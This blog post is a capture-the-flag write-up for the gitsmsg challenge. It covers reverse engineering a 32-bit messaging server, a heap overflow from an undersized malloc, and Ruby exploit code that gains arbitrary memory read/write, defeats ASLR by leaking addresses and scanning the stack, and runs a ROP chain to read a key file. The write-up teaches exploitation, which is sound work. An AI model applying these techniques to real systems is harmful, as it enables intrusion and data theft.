Ghost in the Shellcode: gitsmsg (Pwnage 299)

“It’s Saturday night; I have no date, a 2L bottle of Shasta, and my all-rush mix tape. Let’s rock!”

…that’s what I said before I started gitsmsg. I then entered “Rush” into Pandora, and listened to a mix of Rush, Kansas, Queen, Billy Idol, and other 80’s rock for the entire level. True story.

Anyway, let’s get on with it! Not too long ago I posted my writeup for the 100-level “Pwnage” challenge from Ghost in the Shellcode. Now, it’s time to get a little more advanced and talk about the 299-level challenge: gitsmsg. Solved by only 11 teams, this was considerably more challenging.

As before, you can obtain the binary, my annotated IDA database, and exploit code on my Github page


I’ll start right out by saying: gits was a huge timesink, for me. It was a Linux-based 32-bit application, which was nice, but the codebase was biiiiig and scary, it took a long time to reverse it, and then possibly even longer to get the exploit working. I’ll explain the bumps I hit as I go through this.

The summary is, it’s a messaging server. You log in, queue/view/modify/delete messages for other users, send those messages, and read your own. The messages are stored in a heap-based linked list, and one type of message was vulnerable to a heap-based overflow. To make things difficult, the system implemented address-space layout randomization (ASLR) and data execution prevention (DEP), which had to be bypassed, as well as having read-only relocations (RELRO)enabled, which marks its imports as read-only once they’ve been set up by the dynamic linker.

So, a heap overflow on a system with all modern protections. Sounds like a challenge!

This time, I’m not going to spend any time on the assembly or reversing portions, there’s just too much. I’ll describe the protocol, the vulnerability, and the exploit. My IDA file—available from the Github link above—is heavily annotated, so feel free to peruse it! And if you’re going to debug it, make sure you disable fork()/alarm() as I described in my last post!

The protocol

As I mentioned before, this is a messaging server. It supports eight different payload types, numbered 0x10 to 0x17, which can be used in nine different message types, numbered 0x01 to 0x09. Just for fun, here are my scratch notes I wrote while working on it.

Payload types

The following payloads are defined:

  • 0x10 :: a byte (uint8)
  • 0x11 :: an integer (uint32)
  • 0x12 :: a double (uint64)
  • 0x13 :: an array of bytes (uint8[])
  • 0x14 :: an array of integers (uint32[])
  • 0x15 :: an array of doubles (uint64[])
  • 0x16 :: a static null-terminated string (there are 4 or 5 possible choices, indexed with a byte value)

It’s possible that the types I called double might actually be intended as 64-bit integers, but ultimately it doesn’t matter.

No message can be longer than 0x400 bytes, total. Which means an array of doubles can’t be longer than 0x80 elements (0x80 elements * 8 bytes/element = 0x400 bytes).

Message types

These payload types can be used in any of the 9 message types:

  • 0x01 :: login :: must be sent initially, also retrieves your messages
  • 0x02 :: delete_queued_message :: unlinks a message from a linked list
  • 0x03 :: retrieve_my_messages :: retrieve a list of the queued messages I've sent
  • 0x04 :: store_message :: saves a message into a linked list of queued messages
  • 0x05 :: get_stored_message :: retrieves and displays a message from a linked list
  • 0x06 :: do_weird_math :: loops through the messages and does some kind of math that I didn't dig into
  • 0x07 :: send_queued_messages :: writes all your messages to the filesystem under the recipient's username; he'll get them when he logs in
  • 0x08 :: edit_queued_message :: edit a queued message
  • 0x09 :: quit

Message struct

The messages are all stored in a struct that looks like:

  • (uint32) unknown
  • (uint32) message_type
  • (uint32) message-specific payload (see below)
  • (uint32) message-specific payload (part 2)
  • (char[256]) from_username
  • (char[256]) to_username
  • (char[240]) filename
  • (char[272]) unknown/unused
  • (void*) next_message
  • </ul> Basically, a linked list. The most interesting field is "message-specific payload", which contains different data depending on the message_type (I'm guessing it's implemented as a union in the original program). For the simple datatypes (byte/int32/double), the message-specific payload is simply the 8-, 32-, or 64-bit value, stored across the pair of message-specific payload values. For the array types (byte array/int32 array/double array), the first message-specific payload value is a 32-bit pointer to some freshly allocated memory, and the second is the length of said memory (this pair will be very important later, when we read/write arbitrary memory!). Finally, for the static string type, it's a pointer to one of several static strings that are hardcoded into the binary (this value will be useful later when we want to bypass ASLR). Later on, there's a field I called 'unknown/unused'; I suspect that it's simply designed to make the struct bigger than a single message can possibly be—0x400 bytes—to prevent overwriting the 'next_message' pointer. But that's purely an unvalidated guess, especially since there are easier and better ways to get an arbitrary memory write (as I'll explain later).

    The vulnerability

    I actually found this issue quite by accident. I was implementing the store/get protocol, and I kept getting mysterious SIG_ABRT messages. I plugged in a debugger and found that it was crashing in malloc(). Sweet! Sounds like a heap overflow! I narrowed it down by simply adding/removing messages of the different types, until I discovered that message type 0x15—DOUBLE_ARRAY—was the culprit. I took a look at the code that saves the double arrays to memory and immediately noticed this:
    .text:B7FFD897         mov     eax, dword ptr [esp+3Ch+local_length] ; jumptable 000017B1 case 5
    .text:B7FFD89B         lea     esi, [eax*8+0]  ; esi = local_length * 8
    .text:B7FFD8A2         cmp     esi, 3FFh
    .text:B7FFD8A8         mov     [ebp+message.length_for_certain_types], eax
    .text:B7FFD8AB         ja      return_send_1005
    .text:B7FFD8B1         mov     [esp+3Ch+out_arg_0], eax ; size
    .text:B7FFD8B4         call    _malloc         ; XXX - VULN! Allocate the wrong number of bytes - it's not multiplying by 8
    .text:B7FFD8B9         test    eax, eax
    .text:B7FFD8BB         jnz     short receive_esi_bytes_into_eax
    .text:B7FFD8BD         lea     esi, [esi+0]
    .text:B7FFD8C0         jmp     return_send_1005
    It's multiplying the array size by 8, but not the malloc'd size! That means it'll always try to copy 8x too much data into the array! Now, what can we do with this?

    Reading and writing arbitrary memory

    It's important to remember the structure of array-containing messages to understand how to read memory. In particular, this structure:
    • (uint32) unknown
    • (uint32) message_type
    • (uint32) message-specific payload (pointer)
    • (uint32) message-specific payload (length)
    • ...
    Let's say we allocate an array of ten doubles using the following code (you can find these functions defined in my exploit code on Github):
     1 s ="", 8585)
     3 receive_code(s, 0x00001000, "init")
     5 login(s)
     7 store(s, VARDATA_TYPE_DOUBLE_ARRAY, [0x4141414141414141] * 10)
     8 result = get(s, 0)
    10 Hex.print(result)
    Everything will be normal and it'll output:
    0000  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41   AAAAAAAAAAAAAAAA
    0010  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41   AAAAAAAAAAAAAAAA
    0020  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41   AAAAAAAAAAAAAAAA
    0030  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41   AAAAAAAAAAAAAAAA
    0040  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41   AAAAAAAAAAAAAAAA
    Great! Now let's allocate a int32 array, right after the double array:
    1 store(s, VARDATA_TYPE_DOUBLE_ARRAY, [0x4141414141414141] * 10)
    2 store(s, VARDATA_TYPE_INT_ARRAY, [0x42424242] * 2)
    3 Hex.print(get(s, 1))
    4 Hex.print(get(s, 0))
    We get this output:
    2 0000  41 41 41 41 41 41 41 41 41 41 41 41 19 04 00 00   AAAAAAAAAAAA....
    3 0010  01 00 00 00 14 00 00 00 48 28 00 B8 02 00 00 00   ........H(......
    4 0020  41 41 41 41 41 41 41 41 41 41 00 41 41 41 41 41   AAAAAAAAAA.AAAAA
    5 0030  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41   AAAAAAAAAAAAAAAA
    6 0040  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41   AAAAAAAAAAAAAAAA
    7 Length: 0x50 (80)
    8 0000  42 42 42 42 42 42 42 42                           BBBBBBBB
    9 Length: 0x8 (8)
    Woah, what's going on here!? What we're actually seeing is the first 0x0c (12) bytes of the double array that we created, printing out as normal (a bunch of 'A's), followed by the Heap header of the next message! The first array thinks it has 80 bytes to itself, and uses/displays all of them, when in reality it only actually has about 12 bytes (we only allocated 8 bytes, but rounding happens). The remaining 68 bytes are still in the heap's pool, and are completely fair game to be allocted. Then, when the second array is allocated, it takes up those bytes. In other words, we have memory that looks like this:
    |                                  Unallocated..........                                             |
    |  [empty memory]                                                                                    |
    The first array is stored in allocated memory. First, the message metadata (the type, message-specific data, to, from, filename, next message) is allocated. We'll ignore that for now. More importantly, the data buffer is allocated, and it's allocated too short! Then array requests 8 bytes to store all its data, and gets 12 bytes (because rounding or whatever):
    |   array1   |                    Unallocated..........                                              |
    |  [empty memory]                                                                                    |
    The first array thinks it has 80 bytes, and fills it all up
    |   array1   |                    Unallocated..........                                              |
    Then along comes array2. Two chunks of memory are allocated for it, as well. The message metadata is allocated first, then a buffer for the message data is allocated. Because the metadata is allocated first, it ends up right after array1, and immediately populates the heap header:
    |  array1    |                    array2 metadata......                                              |
    |AAAAAAAAAAAA\x19\x04\x00\x00\x01\x00\x00\x00AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA                    |
    Then message2 populates its various values, including the type (0x14 = INT_ARRAY), message-specific data (pointer to buffer = 0xb8002848, and length = 0x00000002), and from_username (which, kind of confusingly, I set to all 'A's). In the end, the entire rest of array1 is overwritten:
    |  array1    |                    array2 metadata......                                              |
    Then, when we displayed it, we saw exactly that. The most interesting part of this is the message-specific data at bytes 0x18 - 0x20 of array2: 0xb8002848 and 0x00000002. They are part of the second array's metadata, and are located right smack in the middle of where the first array thinks its data is! And since the first array thinks the memory belongs to it, we can read/write it via the first array. To put it another way, when array1 thinks it's editing its own value, it's actually editing array2's metadata. What happens if I now edit the first array (the value here, 0xB7FFEC04, is a place where I happen know I'll find a static string in memory)?
    edit(s, 1, 3, [0xB7FFEC04, 10].pack("II"))
    Then read the second?
    Hex.print(get(s, 0))
    It's going to dump out whatever happened to be in memory! It's truncated to the length I set (10 bytes) multiplied by the element size (and INT_ARRAY has 4-byte elements) for a total length of 40 bytes:
    1 Length: 0x8 (8)
    2 0000  2F 68 6F 6D 65 2F 67 69 74 73 6D 73 67 2F 6D 73   /home/gitsmsg/ms
    3 0010  67 73 2F 25 73 2F 25 30 38 78 25 30 38 78 00 00   gs/%s/%08x%08x..
    4 0020  55 6E 62 72 65 61 6B 61                           Unbreaka
    Going back to the memory layout we looked at before, we saw that the message-specific data (the pointer and the length) overwrote array1:
    |  array1    |                    array2 metadata......                                              |
    But we modified array1 to change those values:
    |  array1    |                    array2 metadata......                                              |
    And therefore, when array2 thought it was reading from its own buffer, it was actually reading from the wrong location - 0xB7FFEC04. (If we use the edit() function on array2, we can write to that memory as well.) The summary is, we can read and write arbitrary memory, by allocating two arrays, using the first to modify the second's metadata, then reading or writing the second's data. Still with me? I hope so!

    Bypassing ASLR

    For those of you who don't know what ASLR is, I recommend reading the Wikipedia page. The summary is, it means that modules and stack don't load to the same address twice. So, even though I have an arbitrary read/write memory attack, I don't know where memory is, in theory. So how do we find it? The first thing to realize is that the size of the binary in memory doesn't change, and the parts within the binary don't get re-arranged, so if we can determine where anything in the binary gets loaded, we can use clever math to figure out where everything gets loaded. We just have to leak a single address. How do we leak a single address? It turns out, with the read-memory attack we just saw, this is rather easy. We allocate a double array, as usual, which will get overwritten by the next allocation:
    1 store(s, VARDATA_TYPE_DOUBLE_ARRAY, [0x4141414141414141] * 10)
    Then we allocate a static string, which will overwrite the latter part of the double array:
    1 store(s, VARDATA_TYPE_STRING, 0)
    As I've mentioned before, the strings are indexes into a hardcoded list of strings. Therefore, the address of a static string in the binary will be saved in the message-specific data. Now, if we print out the double array:
    1 Hex.print(get(s, 1))
    We get the address of the first such string:
    1 0000  41 41 41 41 41 41 41 41 41 41 41 41 19 04 00 00   AAAAAAAAAAAA....
    2 0010  01 00 00 00 16 00 00 00 B0 EB FF B7 00 00 00 00   ................
    3 ...
    which is 0xb7ffebb0, in this case. I know—from the disassembled code—that this value is always 0x2bb0 bytes from the start of the binary, so I can calculate that the base address is 0xb7ffebb0 - 0x2bb0, or at address 0xb7ffc000 on this particular execution. From now on, I can base every address on that. And thus, ASLR has been bypassed for the binary. But not, sadly, for the stack. I couldn't find any way to leak a useful stack address.

    Controlling EIP

    Up till now, every writeup I've read has taken essentially the same steps, although they don't go through them in as much detail as me (I love writing :) ). However, this is where paths diverge, and no two people have taken the same one. The most obvious solution to controlling EIP is to overwrite the global offset table, which is the same as the solution to TI-1337. But, after a lot of mysterious crashing and debugging, I found out what RELRO means: it means that the relocations are re-mapped as read-only after they are filled in. The .dtor section (destructors) are likewise mapped as read-only. Crap! I spent a long, long time trying to figure out what to overwrite. Can I cause path traversal? Can anything in the .data section cause an overflow? Can I read a stack address from anywhere in known memory? etc. etc., but no dice. Eventually, I realized that I could read large chunks of memory, so why don't I read the entire space where the stack might be? Experimentally, I determined that, at least on my system, the stack was always between 0xBF800000 and 0xBFFFFFFF. With that in mind, I wrote this beast:
     1 # This function is kind of an ugly hack, but it works reliably so I can't really
     2 # complain.
     3 #
     4 # It basically searches a large chunk of memory for a specific return address.
     5 # When it finds that address, it returns there.
     6 def find_return_address(s, base_addr)
     7   address_to_find = [base_addr + MAIN_RETURN_ADDRESS].pack("I")
     9   # Store an array of doubles. This will overlap the next allocation
    10   store(s, VARDATA_TYPE_DOUBLE_ARRAY, [0x5e5e5e5e5e5e5e5e] * 4)
    12   # Store an array of bytes. We'll be able to change the length and locatino
    13   # of this buffer in order to read arbitrary memory
    14   store(s, VARDATA_TYPE_BYTE_ARRAY, [0x41])
    16   # Overwrite the location and size of the byte array. The location will be
    17   # set to STACK_MIN, and the size will be set to STACK_MAX - STACK_MIN
    18   edit(s, 1, 3, [STACK_MIN, (STACK_MAX - STACK_MIN)].pack("II"))
    19   puts("Reading the stack (0x%08x - 0x%08x)..." % [STACK_MIN, STACK_MAX])
    21   # We have to re-implement "get" here, so we can handle a large buffer and
    22   # so we can quit when we find what we need
    23   out = [MESSAGE_GET, 0].pack("II")
    24   s.write(out)
    25   get_int(s) # type (don't care)
    26   len = get_int(s)
    27   result = ""
    29   # Loop and read till we either reach the end, of we find the value we need
    30   while(result.length < len)
    31     result = result + s.recv(STACK_MAX - STACK_MIN + 1)
    33     # As soon as we find the location, end
    34     if(loc = result.index(address_to_find))
    35       return STACK_MIN + loc
    36     end
    37   end
    39   # D'awww :(
    40   puts("Couldn't find the return address :(")
    41   exit
    42 end
    It uses the exact same technique as we initially used to read that static string from memory, except instead of reading 20 or 30 bytes, it reads 0x7fffff—that's about 8 megabytes. Somewhere in that chunk of memory will be the actual stack. And somewhere on the stack will be the return address of the main looping function. And, fortunately, because I can capture the base address of the binary (outlined last section), I know exactly what that address will be! To put it another way: I know that the main loop returns to an address when it's done. I can calculate that address, and therefore I know the absolute return address of the main loop. If I know it, it means I can find it on the stack. And if I can find it on the stack, it means I can change it. Here's some code that finds the address and changes it:
     1 # Set up the connection
     2 s ="", 8585)
     3 receive_code(s, 0x00001000, "init")
     4 login(s)
     6 # Get the base address
     7 base_addr = get_base_address(s)
     9 # Get the return address
    10 return_address = find_return_address(s, base_addr)
    12 # Do a typical overwrite - overwrite the main loop's return address
    13 # with 0x43434343
    14 store(s, VARDATA_TYPE_DOUBLE_ARRAY, [0x4141414141414141] * 10)
    15 store(s, VARDATA_TYPE_INT_ARRAY, [0x42424242])
    16 edit(s, 1, 3, [return_address, 1].pack("II"))
    17 edit(s, 0, 0, [0x43434343].pack("I"))
    19 # Cause the main loop to return
    20 quit(s)
    Can you guess what happens to the server?
    Program received signal SIGSEGV, Segmentation fault.
    0x43434343 in ?? ()
    Yup, EIP control. To summarize: reading the entire stack is hacky, and I doubt it will work on a 64-bit system, but it worked great in this case!

    Aside: Stashing data

    It's really easy to stash data and get the address back. I'm going to want to open and read a file, later, so I need a way to stash the file and reference it later. This documented code should explain everything:
    # Store a series of bytes in memory, and return the absolute address
    # to where in memory those bytes are stored
    def stash_data(s, data)
      # Store an array of doubles - this will allocate 4 bytes and overwrite 32
      store(s, VARDATA_TYPE_DOUBLE_ARRAY, [0x5e5e5e5e5e5e5e5e] * 4)
      # Store an array of bytes, which are the data. It will allocate a buffer
      # in which to store these bytes, a pointer to which is written over the
      # previous entry
      store(s, VARDATA_TYPE_BYTE_ARRAY, data.bytes.to_a)
      # Get bytes 24 - 27 of the double array, which is where a pointer to the
      # allocated buffer (containing 'data') will be stored
      result = get(s, 1)[24..27].unpack("I").pop
      puts("'%s' stored at 0x%08x" % [data, result])
      return result

    Getting execution

    So, I got this all working, and immediately stashed some simple shellcode and jumped to it. And it crashed. That means that data execution prevention—DEP—is enabled, so I can only execute code from +x sections of memory. I know how to do that fairly easily, but it was a kick in the face after all that work. Just make this easy on me, guys! :) This isn't going to teach you how to write a ROP payload (one of my past CTF blogs will teach you in great detail!). But let me tell you: once you do this a couple times, it actually gets really easy!

    Another aside: helpful hint on testing your exploit

    Super helpful hint: the first thing I did after realizing that DEP was enabled was jump to base_addr+0x2350, which looks like this:
    .text:B7FFE350 handle_packet_00000009_quit:            ; CODE XREF: do_client_stuff+71j
    .text:B7FFE350                                         ; DATA XREF: do_client_stuff:off_B7FFE324o
    .text:B7FFE350                 mov     [esp+2Ch+out_arg_0], 1003h ; packet 9 returns the integer 0x00001003 then exits
    .text:B7FFE357                 call    send_int
    .text:B7FFE35C loc_B7FFE35C:                           ; CODE XREF: do_client_stuff+5Bj
    .text:B7FFE35C                 add     esp, 20h
    .text:B7FFE35F                 xor     eax, eax
    .text:B7FFE361                 pop     ebx
    .text:B7FFE362                 pop     esi
    .text:B7FFE363                 pop     edi
    .text:B7FFE364                 retn
    It sends out the integer 0x1003, then attempts to return (and probably crashes). But getting that 0x1003 back from the socket after writing this was exactly the push I needed to keep going: I knew my EIP-control was working. Besides returning into known-good code like that, the shellcode eb fe (jmp -2) and cd 03 (debug breakpoint) are fantastic ways to debug exploits. The former never returns, and the latter crashes immediately (and gives you debug control if it's local). It's the perfect way to test if your code is actually being run!

    Back to our originally scheduled program...

    All right, let's look at our ROP chain!
    # This generates the ROP stack. It's a simple open + read + write. The
    # only thing I'm not proud of here is that I make an assumption about what
    # the file handle will be after the open() call - but it seems to reliably
    # be '1' in my testing
    def get_rop(file_path, base_addr, fd)
        stack = [
          # open(filename, 0)
          base_addr + OPEN,  # open()
          base_addr + PPR,   # pop/pop/ret
          file_path,         # filename = value we created
          0,                 # flags
          # read(fd, filename, 100) # We're re-using the filename as a buffer
          base_addr + READ,  # read()
          base_addr + PPPR,  # pop/pop/pop/ret
          0,                 # fd - Because all descriptors are closed, the first available descriptor is '0'
          file_path,         # buf
          100,               # count
          # write(fd, filename, 0)
          base_addr + WRITE, # write()
          base_addr + PPPR,  # pop/pop/pop/ret
          fd,                # fd
          file_path,         # buf
          100,               # count
          # This was simply for testing, it sends 4 bytes then exits
          #base_addr + 0x2350
        return stack
    Once again, this is fairly simple! We open a file. The file_path is something we stashed earlier, and is "/home/gitsmsg/key". We return to a pop/pop/ret to clean the two arguments off the stack. We read up to 100 bytes from the file into the place where we stashed the filename (since it's handy and writeable). We use the file handle 0, because that's the handle that's always used (all the handles are closed in the child process, and the syscall promises to use the lowest un-used handle). Hardcoding the file handle was ugly, but way easier than actually figuring it out. We write up to 100 bytes from that buffer back to the main file descriptor of the connection—that is, back to the socket that I'm communicating through. This descriptor was obtained by reading the right place in memory. It's simple, but it works! And if all goes according to plan, here's the exploit running:
    $ ruby sploit.rb
    ** Initializing
    ** Logging in
    ** Stashing a path to the file on the heap
    '/home/gitsmsg/key' stored at 0xb8c2f848
    ** Using a memory leak to get the base address [ASLR Bypass]
    ... found it @ 0xb77dd000!
    ** Reading the file descriptor from memory
    ... it's 4!
    ** Searching stack memory for the return address [Another ASLR Bypass]
    Reading the stack (0xbf800000 - 0xbfffffff)...
    ... found it @ 0xbfd0546c
    ** Generating the ROP chain [DEP Bypass]
    ** Writing the ROP chain to the stack
    ** Sending a 'quit' message, to trigger the payload
    ** Crossing our fingers and waiting for the password
    The key is: lol, tagged unions for the WIN!
    w00t! Full exploit is here.


    For those of you who are counting, this is a heap overflow with ASLR, DEP, stack cookies, RELRO, and safe heap unlinking. We bypass some of those, and just ignore others that don't apply, to run arbitrary code 100% reliably. I'm proud to say, it's the most difficult exploit I've ever written, and I'm thrilled I could share it with everybody!


Join the conversation on this Mastodon post (replies will appear below)!

    Loading comments...